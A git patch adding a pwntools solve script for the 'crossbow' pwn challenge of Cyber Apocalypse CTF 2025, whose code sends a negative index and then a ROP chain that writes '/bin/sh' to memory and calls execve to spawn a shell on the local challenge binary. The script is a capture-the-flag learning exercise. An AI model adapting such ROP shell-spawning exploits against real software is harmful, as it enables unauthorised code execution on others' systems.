From 22ae6d18efe89af13d63087d7c775633c8d2b6e5 Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Thu, 27 Mar 2025 23:57:18 +0300
Subject: [PATCH] solve script

---
 .../crossbow/a.py                             | 37 +++++++++++++++++++
 1 file changed, 37 insertions(+)
 create mode 100644 cyberapocalypse_ctf_2025_tales_from_eldoria/crossbow/a.py

diff --git a/cyberapocalypse_ctf_2025_tales_from_eldoria/crossbow/a.py b/cyberapocalypse_ctf_2025_tales_from_eldoria/crossbow/a.py
new file mode 100644
index 0000000..f326158
--- /dev/null
+++ b/cyberapocalypse_ctf_2025_tales_from_eldoria/crossbow/a.py
@@ -0,0 +1,37 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./crossbow", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.sendlineafter(b": ", a)
+ss = lambda a: r.sendlineafter(b"> ", a)
+
+# gadgets
+pop_rax = 0x401001
+pop_rdi = 0x401d6c
+pop_rsi = 0x40566b
+pop_rdx = 0x401139
+syscall = 0x4015d3
+mov_rax_rdi = 0x4020f5
+
+# buf
+buf = b"JUNK"*2
+buf += p64(pop_rax)
+buf += b"/bin/sh\0"
+buf += p64(pop_rdi)
+buf += p64(0x40d500)
+buf += p64(mov_rax_rdi)
+buf += p64(pop_rax)
+buf += p64(59)
+buf += p64(pop_rsi)
+buf += p64(0)
+buf += p64(pop_rdx)
+buf += p64(0)
+buf += p64(syscall)
+s(b"-2")
+ss(buf)
+
+r.interactive()
\ No newline at end of file